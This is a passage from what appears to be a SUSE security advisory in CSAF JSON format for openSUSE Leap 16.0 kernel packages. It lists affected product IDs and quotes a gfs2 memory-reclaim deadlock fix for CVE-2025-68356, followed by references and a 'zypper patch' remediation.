"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68349"
},
{
"cve": "CVE-2025-68356",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68356"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngfs2: Prevent recursive memory reclaim\n\nFunction new_inode() returns a new inode with inode-\u003ei_mapping-\u003egfp_mask\nset to GFP_HIGHUSER_MOVABLE. This value includes the __GFP_FS flag, so\nallocations in that address space can recurse into filesystem memory\nreclaim. We don\u0027t want that to happen because it can consume a\nsignificant amount of stack memory.\n\nWorse than that is that it can also deadlock: for example, in several\nplaces, gfs2_unstuff_dinode() is called inside filesystem transactions.\nThis calls filemap_grab_folio(), which can allocate a new folio, which\ncan trigger memory reclaim. If memory reclaim recurses into the\nfilesystem and starts another transaction, a deadlock will ensue.\n\nTo fix these kinds of problems, prevent memory reclaim from recursing\ninto filesystem code by making sure that the gfp_mask of inode address\nspaces doesn\u0027t include __GFP_FS.\n\nThe \"meta\" and resource group address spaces were already using GFP_NOFS\nas their gfp_mask (which doesn\u0027t include __GFP_FS). The default value\nof GFP_HIGHUSER_MOVABLE is less restrictive than GFP_NOFS, though. To\navoid being overly limiting, use the default value and only knock off\nthe __GFP_FS flag. I\u0027m not sure if this will actually make a\ndifference, but it also shouldn\u0027t hurt.\n\nThis patch is loosely based on commit ad22c7a043c2 (\"xfs: prevent stack\noverflows from page cache allocation\").\n\nFixes xfstest generic/273.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68356",
"url": "https://www.suse.com/security/cve/CVE-2025-68356"
},
{
"category": "external",
"summary": "SUSE Bug 1255593 for CVE-2025-68356",
"url": "https://bugzilla.suse.com/1255593"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
